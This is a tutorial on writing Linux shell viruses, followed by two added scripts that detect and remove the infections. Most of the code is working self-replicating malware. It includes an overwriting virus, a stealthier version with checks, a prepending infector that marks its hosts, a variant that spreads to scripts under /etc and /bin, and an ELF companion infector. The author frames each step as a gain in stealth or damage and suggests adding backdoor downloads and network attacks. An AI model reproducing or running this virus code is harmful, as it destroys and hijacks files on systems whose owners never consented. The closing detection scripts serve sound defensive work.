Shell virus techniques
This article assumes at least a basic knowledge of Linux shell programming and of how viruses work. OK, let's get started!
Let's first look at the most primitive shell virus. The code says it best:
    #shellvirus I
    for file in *
    do
    cp $0 $file
    done
Simple, isn't it? It walks every file in the current directory and overwrites each one with a copy of itself. But Linux is a multi-user system and its files are permission-protected, so this script throws a pile of errors, the administrator notices it quickly and its spread is stopped. If we add a few checks to the script, its stealth improves a lot:
    #shellvirus II
    for file in *
    do
    if test -f $file
    then
    if test -x $file
    then
    if test -w $file
    then
    if grep -s echo $file > .mmm
    then
    cp $0 $file
    fi; fi; fi; fi
    done
    rm .mmm -f
OK, that is a bit better. We added checks for whether the name is a regular file, whether it is executable, whether we are allowed to write to it, and (crudely, by looking for the word echo) whether it is a script; only when all of them pass does it run cp $0 $file. Run it and every script in the directory is gone, replaced by the virus.
The line
    if grep -s echo $file > .mmm
can also be written as
    if file $file | grep -s 'Bourne shell script' > /dev/null; then
which asks file(1) whether the file is a shell script. Note that the wording of file's output differs between versions and interpreters (a current file prints 'POSIX shell script' for #!/bin/sh and 'Bourne-Again shell script' for #!/bin/bash), so the pattern has to match what your system actually prints.
However, a script infected this way does nothing else afterwards. It is less harmful than a binary virus, because the script above simply overwrites its host and the host stops working. So here I borrow the traditional binary-virus infection mechanism: prepend the virus to the host, so the host still runs afterwards. The effect is quite good :). Look at the following code:
    #infection
    head -n 23 $0 > .test              # save the virus body (its own first 23 lines) to .test
    for file in *                      # walk the current directory
    do
    if test -f $file                   # regular file?
    then
    if test -x $file                   # executable?
    then
    if test -w $file                   # writable by us?
    then
    if grep -s echo $file > .mmm       # looks like a script?
    then
    head -n 1 $file > .mm              # take the first line of the candidate
    if grep -s infection .mm > .mmm    # does it already carry the marker?
    then
    rm -f .mm                          # already infected, skip it
    else
    cat $file > .SAVEE                 # not yet infected: familiar? the classic prepending mechanism
    cat .test > $file                  # virus body first ...
    cat .SAVEE >> $file                # ... then the original host, so it still runs
    fi; fi; fi; fi; fi
    done
    rm .test .SAVEE .mmm .mm -f
The comments explain the program. It raises the potential damage, but it is still very easy to find: shell scripts are plain text, and there is no way around that. Still, it is quite harmful. The program uses an infection marker, the string infection in the first line, to decide whether a host is already infected, and you can see that check in the code. One practical detail: the count given to head -n must equal the number of lines in the virus body (23 in the layout above), otherwise it copies too little or too much of itself into each host.
OK. To make the code above harder to notice it needs optimizing; the first step is to tighten the code:
    #infection
    for file in * ;do
    if test -f $file && test -x $file && test -w $file ; then
    if grep -s echo $file > /dev/null ; then
    head -n 1 $file > .mm
    if grep -s infection .mm > /dev/null ; then
    rm .mm -f ; else
    cat $file > .SAVEE
    head -n 13 $0 > $file
    cat .SAVEE >> $file
    fi; fi; fi
    done
    rm .SAVEE .mm -f
Now only two temporary files are created and the code is down to 13 lines. Of course, with ; it could be squeezed into one or two lines, but here I only want to explain the idea.
Well, let's see what else a shell virus can do. We may want to infect files in other directories, such as /, /etc or /bin, because most of the useful system scripts live there. Only minor changes to the code above are needed :)
    #infection
    xtemp=$PWD                         # save the current directory
    head -n 22 $0 > /.test
    for dir in /* ; do                 # walk the top-level directories
    if test -d $dir ; then             # if it is a directory, enter it
    cd $dir
    for file in * ; do                 # walk the files in it
    if test -f $file && test -x $file && test -w $file ; then   # regular, executable, writable?
    if grep -s echo $file > /dev/null ; then                     # looks like a script?
    head -n 1 $file > .mm
    if grep -s infection .mm > /dev/null ; then                  # already infected?
    rm .mm -f ; else
    cat $file > /.SAVEE                # same prepending mechanism as before, applied to each uninfected script
    cat /.test > $file
    cat /.SAVEE >> $file
    fi; fi; fi
    done
    cd ..
    fi
    done
    cd $xtemp                          # back to where we started
    rm /.test /.SAVEE .mm -f
In fact, this code only infects the directories directly under /; to go deeper you just add a few more loops. Similarly, a shell virus can do many other things: download a backdoor program and open the machine up, actively attack other hosts reachable over the network, mail itself to the user's contacts, and so on. In short, the technique is not sophisticated, but it is practical and worth explaining.
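The defender's side of the prepending variants above (the 13-line version and the one that walks the top-level directories), as an added example that is not code from the original article. It uses the virus's own tell, the word infection in a host's first line, to find infected scripts anywhere under a directory tree, and strips the prepended body again. The body length it removes (VIRUS_LINES, 13 for the compact variant) is an assumption that has to be checked against the actual sample; the fixtures it scans are constructed here, with a comment-only stand-in for the virus body, so the dry run touches no real virus.

```sh
#!/bin/sh
# Added example (not from the original article): detect and strip the
# prepending infection described above. The virus makes its marker the
# first line of each host and prepends its own body, so a host is restored
# by dropping exactly that many lines. VIRUS_LINES is an assumption about
# the sample being cleaned (13 = the compact variant); verify it first.
MARKER='infection'
VIRUS_LINES=13

# is_infected FILE -> exit 0 if FILE is a regular file whose first line
# contains the marker (the same test the virus itself uses to avoid
# reinfecting a host).
is_infected() {
    [ -f "$1" ] || return 1
    case "$(head -n 1 "$1")" in
        *"$MARKER"*) return 0 ;;
        *) return 1 ;;
    esac
}

# find_infected DIR -> print every infected regular file under DIR,
# recursively, so /etc, /bin and the like can be checked in one pass.
find_infected() {
    find "$1" -type f | while read -r f; do
        is_infected "$f" && printf '%s\n' "$f"
    done
    return 0
}

# disinfect FILE [N] -> drop the first N prepended lines in place.
# Writing back through '>' truncates the existing inode, so the host keeps
# its mode bits (the virus relied on the same property when it infected).
disinfect() {
    n=${2:-$VIRUS_LINES}
    is_infected "$1" || return 1
    tmp=$(mktemp)
    tail -n +$((n + 1)) "$1" > "$tmp"
    cat "$tmp" > "$1"
    rm -f "$tmp"
}

# write_infected PATH BODY -> constructed fixture: marker line, then
# comment-only filler up to VIRUS_LINES lines, then the "original" script.
write_infected() {
    {
        printf '#%s\n' "$MARKER"
        i=2
        while [ $i -le $VIRUS_LINES ]; do
            printf '# constructed virus body line %d\n' "$i"
            i=$((i + 1))
        done
        printf '#!/bin/sh\n%s\n' "$2"
    } > "$1"
}

# make_samples DIR -> constructed directory tree: a clean script, two
# infected ones (one in a subdirectory) and a data file that merely
# mentions "echo", which the virus's crude script test would also hit.
make_samples() {
    d=$1
    mkdir -p "$d/etc"
    printf '#!/bin/sh\necho clean\n' > "$d/clean.sh"
    write_infected "$d/infected.sh" 'echo host'
    write_infected "$d/etc/rc.local" 'echo boot'
    printf 'just data, mentions echo\n' > "$d/notes.txt"
    chmod +x "$d/clean.sh" "$d/infected.sh" "$d/etc/rc.local"
}

# Dry run when invoked as: sh detect_prepend.sh --demo
if [ "${1:-}" = "--demo" ]; then
    work=$(mktemp -d)
    make_samples "$work"
    echo "infected before:"; find_infected "$work"
    find_infected "$work" | while read -r f; do disinfect "$f"; done
    echo "infected after:";  find_infected "$work"
    rm -rf "$work"
fi
```

On a real system, run find_infected against the directories the virus targets and confirm the body length on one sample (count the lines from the marker to the final rm) before calling disinfect on everything, since a wrong count either leaves part of the virus in place or chops the head off the host.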
Similarly, we can also go after ELF files, which is far more destructive; I won't dwell on it here, but have a look at this routine:
    for file in * ;do
    if test -f $file && test -x $file && test -w $file ; then
    if file $file | grep -s 'ELF' > /dev/null ; then   # file(1) reports e.g. "ELF 64-bit LSB executable"
    mv $file .$file                    # hide the real binary as a dot-file
    head -n 9 $0 > $file               # and put the virus in its place
    chmod +x $file                     # '>' created a fresh file, so restore the execute bit
    fi; fi
    done
    exec ./.$(basename $0) "$@"        # finally run the hidden original so the host still works
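The routine above is a companion infection: the binary survives under a hidden dot-name and a script stands in front of it. A legitimate program is almost never a shell script sitting next to a hidden ELF of the same name, so that pairing is the thing to hunt for. The following is an added example, not code from the original article. It reads the ELF magic bytes itself instead of trusting the wording of file(1), and builds its own constructed fixtures (a fake "binary" that is only the magic plus padding) so it can be dry-run safely.

```sh
#!/bin/sh
# Added example (not from the original article): find and undo the
# companion-style infection above, in which "name" has been moved to
# ".name" and replaced by a short script that forwards to it.

# is_elf FILE -> exit 0 if FILE starts with the ELF magic 7f 45 4c 46.
# Checking the magic directly avoids depending on file(1)'s output text,
# which changes between versions.
is_elf() {
    [ -f "$1" ] || return 1
    [ "$(dd if="$1" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# find_companions DIR -> print each executable directly under DIR that is
# not itself an ELF but has a hidden ELF sibling named ".<name>".
find_companions() {
    for f in "$1"/*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        is_elf "$f" && continue
        hidden="$(dirname "$f")/.$(basename "$f")"
        is_elf "$hidden" && printf '%s\n' "$f"
    done
    return 0
}

# restore_companion WRAPPER -> move the hidden ELF back over the wrapper
# script, the inverse of the virus's "mv $file .$file".
restore_companion() {
    hidden="$(dirname "$1")/.$(basename "$1")"
    is_elf "$hidden" || return 1
    mv -f "$hidden" "$1"
}

# make_samples DIR -> constructed fixtures: a fake "binary" that is only the
# ELF magic plus padding (not a runnable program) hidden as ".tool" with a
# wrapper script "tool" in front of it, an untouched script, and an
# unrelated hidden text file that must not be flagged.
make_samples() {
    d=$1
    printf '\177ELF%s\n' 'constructed-not-a-real-binary' > "$d/.tool"
    printf '#!/bin/sh\nexec ./.tool "$@"\n' > "$d/tool"
    printf '#!/bin/sh\necho untouched\n' > "$d/ok.sh"
    printf 'plain text\n' > "$d/.rc"
    chmod +x "$d/.tool" "$d/tool" "$d/ok.sh"
}

# Dry run when invoked as: sh find_companions.sh --demo
if [ "${1:-}" = "--demo" ]; then
    work=$(mktemp -d)
    make_samples "$work"
    echo "companion infections:"; find_companions "$work"
    find_companions "$work" | while read -r f; do restore_companion "$f"; done
    echo "after restore:"; find_companions "$work"
    rm -rf "$work"
fi
```

Before restoring anything on a real host, keep a copy of the wrapper script: it is the virus sample, and its head -n count tells you how long the body is for the other variants.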